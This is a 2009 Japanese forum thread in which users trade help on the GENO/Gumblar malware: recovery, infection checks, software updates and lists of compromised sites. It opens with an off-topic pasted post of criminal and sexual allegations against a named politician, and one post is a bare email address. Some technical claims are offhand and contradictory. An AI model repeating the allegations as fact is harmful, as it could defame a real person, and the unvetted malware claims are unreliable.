道路さえあれば国の借金９００兆円もどげんかなるとです 483 名前：192.168.0.774 mailto:sage [2009/07/10(金) 01:43:32 ID:35zxjN7l0] 26 名前： シラネアオイ(アラバマ州)[sage] 投稿日：2009/07/09(木) 21:25:01.62 ID:9KONbv8B エスエスハニーこと東国原英夫知事、自由民主党総裁候補 >>1-5 1986年ビートたけし、たけし軍団と共に講談社を襲撃し、暴行罪で現行犯逮捕 有罪判決（執行猶予） 1998年児童福祉法違反並びに東京都の青少年健全育成条例 違反の容疑で事情聴取、18歳未満とは知らなかったで法的に罪を免れた ここがヘンだよ日本人で警察官も制服脱げば、俺と同じ事みんなやってるんだよという主旨の発言を繰り返していた 1999年オフィス北野の忘年会で、北海ジャンジャンの側頭部を蹴り傷害容疑で書類送検 罰金の略式命令 2008年交際していた女性に避妊をしないで行為し妊娠したら堕ろせと手切れ金150万円払う nagamochi.info/src/up21093.jpg　　 nagamochi.info/src/up21094.jpg 宮崎県の借金を100億円増加させちゃいましたが宮崎を土建化せんといかん！ 道路があれば介護も福祉もいらんとです！ 道路さえあれば年金問題も解決するとです！ 道路さえあれば国の借金９００兆円もどげんかなるとです 484 名前：192.168.0.774 mailto:sage [2009/07/10(金) 02:46:43 ID:uLP/X9D10] >>480 ドライバもわからんだろうし実家から送ってもらうのが楽だよ あとセキュリティ対策ソフトは最新のものを買ってね！ OS入れなおしたらOSと各種ソフトを最新にしてね 485 名前：192.168.0.774 mailto:sage [2009/07/10(金) 03:03:59 ID:zy8UayzW0] >>480 CDRと小冊子くらいならメール便が安くて安全だと思うよ。 それと、アップデートとセキュリティ対策が整うまでは、 必要最低限のWebページ以外は開かないほうがいい。 486 名前：478 mailto:sage [2009/07/10(金) 09:22:17 ID:aAq3fgTNO] アドバイスありがとうございます。 CDｒは部屋の奥底にあるので家族に見つけて もらうのは難しいです。 ８月に実家に帰るのでそれまで使用はやめます。 質問が二つあります。 1 ブルースクリーンしかでない今、データの復帰はできますか？ 2 usbにいくつかフォルダを移しました。 ウィルスが移ってないかわかりますか？ 487 名前：192.168.0.774 mailto:sage [2009/07/10(金) 09:25:46 ID:DM8bUgbH0] 感染したのがいわゆる「GENO」だと特定できてるなら システムファイルごっそり移したとかじゃなけりゃ2は問題無いと思う 1はCDぶち込んで電源いれればクリーンインスコできると思う 488 名前：192.168.0.774 mailto:sage [2009/07/10(金) 10:33:00 ID:TH9/JGS90] 外付けブートCDか、ブートUSBを持っておくべき。今回はいい時期。 489 名前：192.168.0.774 mailto:sage [2009/07/10(金) 15:06:26 ID:uLP/X9D10] >>486 データの復帰はID:aAq3fgTNOがすごくがんばればおそらく可能だけど 何に感染してるかわからないのでデータが安全かどうかわからない 同様に何に感染してるか特定できないのでUSBメモリも安全かどうかわからない Genoだと思ってても本当はどうかわからないし ほかの何かにも感染してるかもしれないよね ID:aAq3fgTNOのレスを見る限りはお金を払って業者に頼むか あきらめるかの二択じゃないかと ちなみにUSBメモリに感染するウイルスの場合、他のPCで使用することにより 感染を広げることもあります どうせ自動起動しちゃうだろうし不用意に確認しようとするのは危ないよ 490 名前：192.168.0.774 mailto:sage [2009/07/10(金) 15:34:14 ID:zy8UayzW0] >>486 クリーンインストールし、全ての設定が終わった上で、 ウィルス対策ソフトをインストールして、ソフトのバージョンおよびウィルスパターンを更新して、 自動再生を切ってからデバイスを差し込んで、ウィルス対策ソフトにUSBをスキャンさせる。 491 名前：192.168.0.774 mailto:sage [2009/07/12(日) 23:16:09 ID:C4vtbwjH0] 伸びてるとおもったらこれか こわい 492 名前：478 mailto:sage [2009/07/16(木) 18:50:22 ID:aablVawQO] 先日はアドバイス沢山ありがとうございました。 実家からCDｒを送ってもらい、パソコンに入れたのですが、 ようこそ→ブルースクリーン でクリーンインストールできませんでした。 修理にださないと無理でしょうか？ 493 名前：192.168.0.774 mailto:sage [2009/07/16(木) 23:50:30 ID:+Jh03mtC0] とりあえずPC詳しい奴にみてもらえｗ ファンが腐ってるかもしれんぞ 494 名前：192.168.0.774 mailto:sage [2009/07/17(金) 02:39:58 ID:aJGYHCxV0] >>492 CDブートにしてないだろ 取説ちゃんと読んでくれ わからんなら買ったメーカーのサポートにでも電話してくれ 495 名前：192.168.0.774 [2009/07/22(水) 12:44:07 ID:9yC5JkR90] システムをクリーンインストールした後はどうしたらいいん？ サーバ内に設置したhtmlファイルなどは一旦全消しすんのかな？ 496 名前：192.168.0.774 mailto:sage [2009/07/22(水) 14:18:30 ID:PLKvcPQ00] >>495 あ？ パソコン持って逃げろ。 497 名前：192.168.0.774 [2009/07/23(木) 19:32:53 ID:Y39ARKpc0] そしてお前はこう言う ↓ 498 名前：192.168.0.774 mailto:sage [2009/07/23(木) 19:51:31 ID:pgIxqnE50] 逃げちゃダメだ。 499 名前：192.168.0.774 mailto:sage [2009/07/23(木) 20:36:24 ID:PXRCXHeF0] 逃げちゃダメだ。 500 名前：192.168.0.774 mailto:sage [2009/07/23(木) 22:21:53 ID:BgO9MD6O0] >>495 どういう問題が起こってるか理解できないなら閉鎖すべき 501 名前：192.168.0.774 mailto:sage [2009/08/17(月) 14:57:37 ID:hbGGuN4M0] 既出かもしれんが ちんこアプロダっていう同人誌うｐしてるサイトがGENOウィルスに感染してることが判明した。 たまに見てた奴とかは気をつけろよ。 しばらくはアクセスしない方がいい。 502 名前：192.168.0.774 mailto:age [2009/08/17(月) 21:10:39 ID:zz5TreCn0] 今更だけど、横浜市役所もやられてたのね。 ゾンビPCが市役所の中に残ってないといいんだけど・・・ ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=city.yokohama.jp 503 名前：192.168.0.774 mailto:sage [2009/08/17(月) 21:47:46 ID:ZC/t7WDI0] >>501 今感染してるの？いままでと使われてる脆弱性は一緒？ それとも未知の脆弱性が使われてるの？ 504 名前：192.168.0.774 mailto:sage [2009/08/18(火) 15:07:14 ID:yHZM8N0b0] 何気なくCCCクリーナーやってみたら JS_GUMBLAR.ERKが検出された。ぐぐってもほとんど情報なし。 つか5月にGENOに感染してリカバリしたってのに。 その時はとにかくまとめwikiにある症状とドンピシャだったんだけど、 今回はなんか重いな、と時々CPUが100になってすぐ戻る。位の症状だった。 ノートン先生は検出せず。 やたらとトロイアタックが来てたのはそういうわけだったのか？ CCCのログ見ると検出された場所が C:\Documents and Settings\○○○○\My Documents\katjusha\kakikomi.txt [JS_GUMBLAR.ERK] なんでこんなとこが感染？？（↑[ ]内は検出されたウィルス） 505 名前：192.168.0.774 mailto:sage [2009/08/18(火) 15:16:58 ID:0i2srOIl0] >>504 それウイルスじゃなくてJavaScriptの文字列がどっかに残ってて反応するんじゃなかったか？ つか名前の先頭にJSって付いてるしな 506 名前：192.168.0.774 mailto:sage [2009/08/18(火) 16:42:27 ID:l+rBKTqS0] >>504 CCCクリーナーについてkwsk 507 名前：192.168.0.774 mailto:sage [2009/08/18(火) 16:51:32 ID:RLJ3E0Kh0] >>506 https://www.ccc.go.jp/flow/index.html 508 名前：192.168.0.774 mailto:sage [2009/08/18(火) 20:18:26 ID:dL5Wim8Q0] >>504 おまえ過去にGENO関連スクリプトをどっかのスレに貼りやがっただろ 509 名前：192.168.0.774 mailto:sage [2009/08/18(火) 20:19:09 ID:dL5Wim8Q0] 日本語でおｋだった 510 名前：504 mailto:sage [2009/08/19(水) 11:38:59 ID:DbCeAkRW0] >>508 そんなことしてないよ〜 GENOでリカバリして以来、かちゅ〜しゃ入れたものの ほとんど起動してなかったし書き込みも1、2回程度。 しかもそれも既女板だし。 ログ見てみたけど該当するJSから始まるウィルス名はなし。 だからkakikomi.txtから検出されたのが？？？なわけ。 511 名前：192.168.0.774 [2009/08/19(水) 16:00:06 ID:8YMbZHjT0] 514 名前：名無しさん＠お腹いっぱい。[] 投稿日：2009/08/19(水) 15:49:34 とあるブログにウイルスバスターのフィッシングレベルを高にすれば GENOウイルス系をほぼ100%防げるってあったけどウイルスバスターって意外と凄いと思った 512 名前：192.168.0.774 mailto:sage [2009/08/20(木) 05:00:33 ID:kk6VBHkM0] ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=nii.ac.jp > Google が最後にこのサイトを巡回したのは2009-08-19で、 > このサイトで不審なコンテンツが最後に検出されたのは2009-08-19です。 国立情報学研究所はちゃんとGENOの駆除を済ませたんだろうか？ 513 名前：192.168.0.774 mailto:sage [2009/08/20(木) 11:02:09 ID:0pZFhpsy0] 変なものは入ってなく見えるけどなあ そこの子サイトよく使うんで、会社のPCもうちのPCも一応チェックしとくか 514 名前：192.168.0.774 mailto:sage [2009/08/20(木) 13:01:02 ID:kk6VBHkM0] 「nii.ac.jp」から絞り込んでみた。 ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=wwwsoc.nii.ac.jp > このサイトで過去 90 日間に Google がテストした 1030 ページのうち > 3 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、 > インストールされていたことが判明しました。 感染歴があるのは「wwwsoc.nii.ac.jp」だけかな? 515 名前：192.168.0.774 mailto:sage [2009/08/20(木) 14:00:22 ID:RCyIYJ870] >>514 そのアドレスだと下位を各学会が使ってたりするからなあ 516 名前：192.168.0.774 mailto:sage [2009/08/22(土) 09:37:06 ID:jhIYmbtr0] >>504 ウェブ改ざんウイルス「JS_GUMBLAR.ERK」が初登場2位 - トレンド週間ランキング ttp://www.security-next.com/011035.html で、バスターのパターンファイル追加の該当リスト（2009/8/9） ttp://matcha139.hiemalis.org/~isamik/ptn/6.351.00.txt バスターのパターンファイルへJS_GUMBLAR.ERKが追加されたのが2009/8/9っぽいから、 単に今まで検出できなかったのが、今になってやっと検出できるようになっただけの希ガス 517 名前：192.168.0.774 mailto:sage [2009/08/22(土) 12:33:21 ID:B5xgqliz0] 1ヶ月ぶりにGENOの感染確認してみたら sqlsodbc.chmのボリュームが2,894,207 バイトになってた･･･ これ感染してるんだよね･･･やべえ･･･ 518 名前：192.168.0.774 mailto:sage [2009/08/22(土) 12:52:46 ID:rMzmO16b0] いまさら感染？ ブラウザの種類とかブラウザの設定とかウイルス対策ソフトとかどうしてたの？ 519 名前：192.168.0.774 mailto:sage [2009/08/22(土) 22:10:42 ID:jhIYmbtr0] >>517 sqlsodbc.chmは盗聴のログって話だから、それだけ肥大化しているってことは かなり色々と盗られたんじゃないかって気がする。 とりあえず、ご愁傷様としか。再インストールしてパスワード全部変えた方が良いでしょうね。 どこのセキュリティソフトを使っていたかわかりませんけど、余裕があるなら シマンテック等のオンラインスキャンをして、何に感染していたか確認しておくのも、 今後のためには良いかも。 520 名前：192.168.0.774 mailto:sage [2009/08/22(土) 23:34:12 ID:B5xgqliz0] ごめんーーーー違ったファイルみてたわ・･･･ ちゃんと正常だった 今月の頭にウィルスバスターの使用期間が切れて後で買えばいいかって思ってて 今までセキュリティなしだったんだよね ･･･セキュリティソフトやっぱ買ったほうがいいね 521 名前：192.168.0.774 mailto:sage [2009/08/22(土) 23:59:52 ID:jhIYmbtr0] >>520 や、正常だったようで、それは何より。 んでも、今使ってるのが期限切れしてるんなら、とりあえず適当な会社の体験版入れてセキュリティを維持するか、 もしくはフリーのでも良いから何か入れておいた方が良いよ。　体験版でも、1ヶ月は市販品と同じ最新状態維持できるし。 ※ ただ、KINGとかZEROは避けた方が無難。フリーより検出率悪いから、それら入れるくらいならフリー使った方が良い。 あと、個人的には、最近バスターはパターンファイルの作成遅れが多くなってきたんで、これも避けた方が良いかも。 （>516みたいな話ね。ウチの会社バスター使ってるんで、ちょっと頑張って欲しいところではある。） 522 名前：192.168.0.774 mailto:sage [2009/08/27(木) 16:01:29 ID:wRk6Vuyp0] avast か AVG か... avast使ってるけどどうもこのごろ心配だなあ あとファイアウォールもいるけど COMODO ,Outpost, Online Armor, PC Toolsがあるけど PC Toolsがわかりやすいらしいというのを見た記憶がある。 COMODOは強力だが使いづらい。 523 名前：192.168.0.774 mailto:sage [2009/09/20(日) 14:33:09 ID:urdUUYmlO] PC初心者です、教えてください。 どうやら感染していたようなのですが、 どういった被害がありますか？ 保存していたファイル等が流出してしまったりするのでしょうか？ 524 名前：192.168.0.774 mailto:sage [2009/09/20(日) 18:21:10 ID:qQSKk28C0] >>523 tp://www31.atwiki.jp/doujin_vinfo/ 525 名前：192.168.0.774 [2009/10/05(月) 20:40:47 ID:THEkkja60] wakatta 526 名前：192.168.0.774 mailto:age [2009/10/18(日) 23:16:07 ID:YIA/Ffw80] 再始動した模様なのでage blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html 感染したまま放置されてたサイトや、 対策が不十分だったサイトを見たら、さっそく変なスクリプト発見・・・ 527 名前：192.168.0.774 mailto:sage [2009/10/18(日) 23:49:21 ID:3V7/xmbJ0] なんと 528 名前：192.168.0.774 [2009/10/19(月) 11:24:25 ID:hqU1jDcR0] セキュ板より転載 366 名前： 名無しさん＠お腹いっぱい。 [sage] 投稿日： 2009/10/19(月) 10:55:17 再襲来したGENOウイルスについて報告してるブログみつけた。 ttp://blogs.yahoo.co.jp/noooo_spam/59011285.html ttp://blogs.yahoo.co.jp/noooo_spam/59020592.html ttp://blogs.yahoo.co.jp/noooo_spam/59029561.html zlkon/gumblar/martuzは単一ホストでウイルスを撒いてたけど、 今度のスクリプトだと陥落した別サイトで撒いてるから、 従来のチェッカーじゃ判別できないな。 529 名前：192.168.0.774 mailto:sage [2009/10/19(月) 21:56:32 ID:SXUexp960] うへー怖いな･･･ 530 名前：192.168.0.774 mailto:sage [2009/10/19(月) 22:53:05 ID:t5PH3W/d0] これは流行りそうだな まさに、gumblar comes back! 531 名前：192.168.0.774 mailto:sage [2009/10/21(水) 04:07:51 ID:BsxJ0MOv0] Google SafeBrowsingで、適当にmartuzスクリプト放置サイトを 拾ってみたら・・・・ martuzスクリプトの直後に NewGumblarのスクリプト（<script src=〜.php ></script>）が追加されてた。 こりゃ同一犯なんだろうねえ・・・・ 532 名前：192.168.0.774 mailto:sage [2009/10/22(木) 13:40:42 ID:9iMdmyQM0] Genoウイルス(Gumblar)検出状況 slashdot.jp/~pluto/journal/491348 このphpファイルは見に行くたびに変わりますが、 カスペルスキーさんはまるで「おれにまかせろ」状態。かっこいい。 533 名前：192.168.0.774 mailto:sage [2009/10/22(木) 15:45:05 ID:WyqDsNKh0] pc12.2ch.net/test/read.cgi/win/1255620129/140 Windowｓが起動できない、（マウスは動くが画面真っ暗でwindowsが起動しない） ってトラブルが出てて、自動更新失敗によるレジストリ破損と見られてるけど、 実はGENOなのか？ pc11.2ch.net/test/read.cgi/sec/1244633881/251 534 名前：192.168.0.774 mailto:sage [2009/10/22(木) 17:00:27 ID:9iMdmyQM0] レジストリのdriverのなんたらとか sqlなんたらchmのハッシュ調べればわかるんでね 535 名前：192.168.0.774 mailto:sage [2009/10/23(金) 22:55:35 ID:epXZwyKF0] >>533 これじゃね？ 黒い画面にマウスカーソル (Win32/Daonol) 　blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx 　再起動後に、黒い画面 (またはログオンスクリーンの色) に、マウスカーソルのみが表示されてしまう・・・ 536 名前：192.168.0.774 [2009/10/24(土) 02:39:17 ID:5GUKVqGx0] 【セキュリティ】「GENO」に酷似したウイルスが流行の兆し、国内60サイトで感染確認（09/10/23） pc11.2ch.net/test/read.cgi/pcnews/1256299220/ GENOウイルスに類似したあらたな攻撃が発生　 tsushima.2ch.net/test/read.cgi/news/1256287835/ 537 名前：192.168.0.774 mailto:sage [2009/10/25(日) 00:04:06 ID:h/d9Job30] 今回のGENOも感染してるか否かの確認方法は前回と同じでいいのか？ 538 名前：192.168.0.774 mailto:sage [2009/10/25(日) 11:40:55 ID:onz9X9EW0] いいんでね? 539 名前：192.168.0.774 mailto:sage [2009/10/25(日) 17:57:44 ID:N2xTSqMh0] >>535 知人PCも22日にこれになってセーフモードもなにも利かないんで しかたないから再セットアップしたぜｗ アンチウイルス入れて無いノーガードPCだった 540 名前：192.168.0.774 mailto:sage [2009/10/25(日) 20:20:23 ID:FaKoDDbI0] >>539 乙です。色々サイト見たけど、この状態からの復旧は相当難しそうですね。 結構Gumblar（GENO)に感染していて潜伏状態だったPC、多いのかな？ Freeのセキュリティソフト、選択肢増えてるんだから何か入れれば良いのにねぇ。（苦笑 MSEあたりなら、ノーガード派にも受け入れやすいんだろうか．．． 541 名前：192.168.0.774 mailto:sage [2009/10/26(月) 06:16:57 ID:bOuJ+ruU0] 俺の友人のXPも真っ黒黒助だ avast入ってたのに ろくに更新もしてないんだとは思うけど なんかlsass.exeエラーは出てるけど真っ黒でカーソル動くだけ 再セットアップしてさらにスキャンしてあげました 542 名前：192.168.0.774 mailto:sage [2009/10/26(月) 18:51:38 ID:iUCf4CzS0] 今回も携帯からサイト見る分は大丈夫なのかな？ 543 名前：192.168.0.774 mailto:sage [2009/10/27(火) 08:26:45 ID:+mI19/Pp0] 問題無いが、パケ代には注意 544 名前：192.168.0.774 mailto:sage [2009/10/27(火) 20:26:11 ID:gldzFeMo0] ＡＶＧで自動アップデートできないのもＧＥＮＯの症状でしょうか？ 545 名前：192.168.0.774 mailto:sage [2009/10/27(火) 23:45:38 ID:Tnfh4hrr0] 違うだろ AVGスレでどうぞ 546 名前：192.168.0.774 mailto:sage [2009/10/28(水) 20:56:21 ID:ALDKpRa40] >544 ＡＶＧで自動アップデートできないのはＧＥＮＯの感染した症状の一部です。 genoは進化していますよ。 ＊＊のアップデートでは対応できません。 547 名前：192.168.0.774 mailto:sage [2009/10/28(水) 21:02:46 ID:ALDKpRa40] AVG 9は、カリカリ・ソフトです。 新型GENOにもまだ未対応です。 ttp://www.virustotal.com/analisis/d7a0ebf90c79ac3bd08dc1e431e0cbcdb01e4e0fbf4a7690b64a6c0ae7262c74-1256543614 548 名前：192.168.0.774 mailto:sage [2009/10/29(木) 01:16:39 ID:vNcQ1fvq0] しばらｌく落ち着いてたと思ってたのに 549 名前：192.168.0.774 mailto:sage [2009/11/05(木) 02:56:10 ID:6KQsgcnM0] Gumblar再々起動 550 名前：192.168.0.774 mailto:age [2009/11/05(木) 03:07:53 ID:Z0Xlitm00] 　 551 名前：192.168.0.774 mailto:sage [2009/11/27(金) 21:39:07 ID:+ILGL8bh0] ニフティのウィルスチェックしようとすると カスペアドオンのインストール画面でブラウザが固まるんだが… 552 名前：192.168.0.774 [2009/12/01(火) 14:10:18 ID:kHQYcET/0] GENOウイルススレ　★23 pc11.2ch.net/test/read.cgi/sec/1259607683/ 553 名前：192.168.0.774 mailto:sage [2009/12/10(木) 14:31:03 ID:IsDGsV3gO] Flashのアップデート公開されたな >552 変な荒らしが住み着いてるぞ、なんだこれ 554 名前：192.168.0.774 mailto:sage [2009/12/10(木) 14:34:02 ID:Bn4hH/xd0] はいはい 555 名前：192.168.0.774 mailto:sage [2009/12/18(金) 15:15:12 ID:zuzqPmN80] うちのも黒い画面になるけど数回つけるとつく ただ壷が使えなくなった 556 名前：192.168.0.774 mailto:sage [2009/12/25(金) 22:23:34 ID:QN6U8Z750] こいつはwindows7でも感染報告あるの？ 557 名前：192.168.0.774 mailto:sage [2009/12/26(土) 07:26:34 ID:xFVMWyO/0] あったね 558 名前：192.168.0.774 [2009/12/27(日) 17:06:12 ID:mjUeSJohO] ken@mx6.ttcn.ne.jp 559 名前：192.168.0.774 mailto:sage [2010/01/07(木) 16:51:36 ID:2C5Kv5XL0] pc11.2ch.net/test/read.cgi/sec/1259607683/405 今北さん用、GENO（Gumblar）ウイルス対処法。 行っておくべき事項を箇条書きにしました。 細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。 (1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする (2）Adobe Readerを最新版に更新する (3) Adobe ReaderのAcrobat JavaScriptを無効に設定 (4) JRE(Java Runtime Environment)を最新版に更新する (5) Flash Playerを最新版に更新する (6) QuickTimeを最新版に更新する (1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。 攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。 Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。 Acrobat JavaScriptを無効にする方法は以下の通り。 (1）Adobe Readerを起動し[編集]メニューの[環境設定]を選択 (2）「分類」の中の「JavaScript」を選択 (3）「Acrobat JavaScriptを使用」のチェックをクリア (4）「OK」ボタンを押す 560 名前：192.168.0.774 [2010/01/11(月) 23:49:13 ID:WnL+xizZ0] windows7って対処方法ないんだよなわろす 561 名前：192.168.0.774 mailto:sage [2010/05/01(土) 17:49:02 ID:lXIq/NWf0] そもそも感染しないから対処する必要はないしね 感染報告はガセだし

---

---

[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef